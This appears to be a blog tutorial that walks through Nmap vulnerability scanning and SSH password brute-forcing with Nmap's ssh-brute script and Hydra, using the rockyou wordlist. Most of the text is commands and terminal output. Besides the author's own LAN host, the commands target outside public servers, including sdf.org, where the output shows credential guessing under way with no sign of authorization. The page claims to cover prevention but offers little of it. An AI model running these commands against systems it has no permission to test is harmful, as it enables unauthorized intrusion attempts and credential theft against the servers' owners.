It is very easy to find vulnerabilities on remote servers using Nmap. The below example is a scan of a Fedora machine running an Apache web server.
┗━━━━━━━━━━┓ john@localhost ~/Documents ┗━━━━━━━━━━━━━╾ ╍▷ nmap -Pn --script vuln 192.168.1.2 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2023-04-19 08:46 AEST Nmap scan report for 192.168.1.2 Host is up (0.00015s latency). Not shown: 997 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http |_http-csrf: Couldn't find any CSRF vulnerabilities. |_http-dombased-xss: Couldn't find any DOM based XSS. | http-enum: |_ /icons/: Potentially interesting folder w/ directory listing |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. |_http-trace: TRACE is enabled |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug) 111/tcp open rpcbind Nmap done: 1 IP address (1 host up) scanned in 31.81 seconds |
The –script vuln parameter will scan for any vulnerabilities on the server.
This is very useful to scan your own server and find any potential issues with the security configuration.
This is another example.
┗━━━━━━━━━━┓ john@localhost ~/Documents ┗━━━━━━━━━━━━━╾ ╍▷ nmap -Pn --script vuln 104.236.193.132 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2023-04-19 09:05 AEST Nmap scan report for bulmacss.scan.leakix.org (104.236.193.132) Host is up (0.24s latency). Not shown: 997 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http |_http-csrf: Couldn't find any CSRF vulnerabilities. |_http-dombased-xss: Couldn't find any DOM based XSS. |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. 646/tcp filtered ldp Nmap done: 1 IP address (1 host up) scanned in 573.77 seconds |
This server has SSH open on the default port. The command below will attempt to brute force the SSH credentials on the remote server.
nmap -p 22 --script ssh-brute.nse --script-args userdb=rockyou.txt,passdb=rockyou.txt --script-args ssh-brute.timeout=4s 104.236.193.132 |
But password authentication is not allowed.
╭──(john㉿DESKTOP-PF01IEE)-[~] ╰───────────────────────────╾┋ nmap -p 22 --script ssh-brute.nse --script-args userdb=rockyou.txt,passdb=rockyou.txt --script-args ssh-brute.timeout=4s 104.236.193.132 Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-19 09:32 AEST Nmap scan report for bulmacss.scan.leakix.org (104.236.193.132) Host is up (0.24s latency). PORT STATE SERVICE 22/tcp open ssh |_ssh-brute: Password authentication not allowed Nmap done: 1 IP address (1 host up) scanned in 2.25 seconds |
But, it is possible to attempt to brute force the username and password if the server does allow password authentication.
╭──(john㉿DESKTOP-PF01IEE)-[~] ╰───────────────────────────╾┋ nmap -p 22 --script ssh-brute.nse --script-args userdb=rockyou.txt,passdb=rockyou.txt --script-args ssh-brute.timeout=4s sdf.org Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-19 09:39 AEST NSE: [ssh-brute] Trying username/password pair: root:root NSE: [ssh-brute] Trying username/password pair: admin:admin NSE: [ssh-brute] Trying username/password pair: administrator:administrator NSE: [ssh-brute] Trying username/password pair: webadmin:webadmin NSE: [ssh-brute] Trying username/password pair: sysadmin:sysadmin NSE: [ssh-brute] Trying username/password pair: netadmin:netadmin NSE: [ssh-brute] Trying username/password pair: guest:guest NSE: [ssh-brute] Trying username/password pair: user:user NSE: [ssh-brute] Trying username/password pair: web:web NSE: [ssh-brute] Trying username/password pair: test:test NSE: [ssh-brute] Trying username/password pair: root: NSE: [ssh-brute] Trying username/password pair: admin: NSE: [ssh-brute] Trying username/password pair: administrator: NSE: [ssh-brute] Trying username/password pair: webadmin: NSE: [ssh-brute] Trying username/password pair: sysadmin: NSE: [ssh-brute] Trying username/password pair: netadmin: NSE: [ssh-brute] Trying username/password pair: guest: NSE: [ssh-brute] Trying username/password pair: user: NSE: [ssh-brute] Trying username/password pair: web: NSE: [ssh-brute] Trying username/password pair: test: NSE: [ssh-brute] Trying username/password pair: root:123456 NSE: [ssh-brute] Trying username/password pair: admin:123456 NSE: [ssh-brute] Trying username/password pair: administrator:123456 NSE: [ssh-brute] Trying username/password pair: webadmin:123456 NSE: [ssh-brute] Trying username/password pair: sysadmin:123456 NSE: [ssh-brute] Trying username/password pair: netadmin:123456 NSE: [ssh-brute] Trying username/password pair: guest:123456 NSE: [ssh-brute] Trying username/password pair: user:123456 NSE: [ssh-brute] Trying username/password pair: web:123456 NSE: [ssh-brute] Trying username/password pair: test:123456 NSE: [ssh-brute] Trying username/password pair: root:12345 NSE: [ssh-brute] Trying username/password pair: admin:12345 NSE: [ssh-brute] Trying username/password pair: administrator:12345 NSE: [ssh-brute] Trying username/password pair: webadmin:12345 NSE: [ssh-brute] Trying username/password pair: sysadmin:12345 NSE: [ssh-brute] Trying username/password pair: netadmin:12345 NSE: [ssh-brute] Trying username/password pair: guest:12345 NSE: [ssh-brute] Trying username/password pair: user:12345 NSE: [ssh-brute] Trying username/password pair: web:12345 NSE: [ssh-brute] Trying username/password pair: test:12345 NSE: [ssh-brute] Trying username/password pair: root:123456789 NSE: [ssh-brute] Trying username/password pair: admin:123456789 NSE: [ssh-brute] Trying username/password pair: administrator:123456789 NSE: [ssh-brute] Trying username/password pair: webadmin:123456789 NSE: [ssh-brute] Trying username/password pair: sysadmin:123456789 |
Hydra is another way to try and crack an SSH password.
╭──(john㉿DESKTOP-PF01IEE)-[~] ╰───────────────────────────╾┋ hydra -l john -P rockyou.txt ssh://192.168.1.2 Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-19 09:54:17 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task [DATA] attacking ssh://192.168.1.2:22/ [STATUS] 166.00 tries/min, 166 tries in 00:01h, 14344234 to do in 1440:12h, 15 active |
Type sudo apt install wordlists on Kali Linux to install any needed wordlist. Then zcat /usr/share/wordlists/rockyou.txt.gz > rockyou.txt.
╭──(john㉿DESKTOP-PF01IEE)-[~] ╰───────────────────────────╾┋ sudo apt install wordlists Reading package lists... Done Building dependency tree... Done Reading state information... Done The following packages were automatically installed and are no longer required: dh-elpa-helper g++-11 gstreamer1.0-gl isa-support libatk1.0-data libavcodec58 libavdevice58 libavfilter7 libavformat58 libavutil56 libdav1d5 libflac8 libgraphene-1.0-0 libgstreamer-gl1.0-0 libicu67 libigdgmm11 libilmbase25 libimobiledevice6 libjs-highlight.js libjs-psl libldap-2.4-2 liblerc3 libllvm12 libmpdec3 libmujs1 libnetpbm10 libnode72 libobjc-11-dev libopenexr25 libpari-gmp-tls7 libperl5.32 libperl5.34 libplacebo120 libplacebo192 libplist3 libpoppler118 libpoppler123 libpostproc55 libpython3.10 libpython3.10-dev libpython3.10-minimal libpython3.10-stdlib libpython3.9 libpython3.9-dev libpython3.9-minimal libpython3.9-stdlib libqt5sql5 libqt5sql5-sqlite libqt5test5 libqt5xml5 libsrt1.4-gnutls libstdc++-11-dev libsvtav1enc0 libswresample3 libswscale5 libusbmuxd6 libwebp6 libwireshark15 libwiretap12 libwmf-0.2-7 libwmf0.2-7 libwsutil13 libx264-160 node-abab node-ansistyles node-array-union node-array-uniq node-asap node-asynckit node-big.js node-combined-stream node-cssom node-cssstyle node-delayed-stream node-domelementtype node-domhandler node-emojis-list node-entities node-execa node-exit-hook node-form-data node-formidable node-jsdom node-loader-utils node-mimic-fn node-parse5 node-psl node-stealthy-require node-strip-eof node-tough-cookie node-uniq node-universalify node-webidl-conversions node-whatwg-fetch perl-modules-5.32 perl-modules-5.34 python3-charset-normalizer python3-idna python3-ldb python3-psutil python3-pyqt5.sip python3-requests python3-setproctitle python3-talloc python3-urllib3 python3.10 python3.10-dev python3.10-minimal python3.9 python3.9-dev python3.9-minimal ruby2.7 ruby3.0 sound-theme-freedesktop sse3-support telnet usbmuxd Use 'sudo apt autoremove' to remove them. The following NEW packages will be installed: wordlists 0 upgraded, 1 newly installed, 0 to remove and 4 not upgraded. Need to get 53.4 MB of archives. After this operation, 53.4 MB of additional disk space will be used. Get:1 http://kali.download/kali kali-rolling/main amd64 wordlists all 2023.1.2 [53.4 MB] Fetched 52.5 MB in 1min 39s (528 kB/s) Selecting previously unselected package wordlists. (Reading database ... 153362 files and directories currently installed.) Preparing to unpack .../wordlists_2023.1.2_all.deb ... Unpacking wordlists (2023.1.2) ... Setting up wordlists (2023.1.2) ... |
Then unpack the wordlist ready for use.
╭──(john㉿DESKTOP-PF01IEE)-[~] ╰───────────────────────────╾┋ zcat /usr/share/wordlists/rockyou.txt.gz > rockyou.txt |
Crack an SSH password with Hydra and ways to avoid this in the future.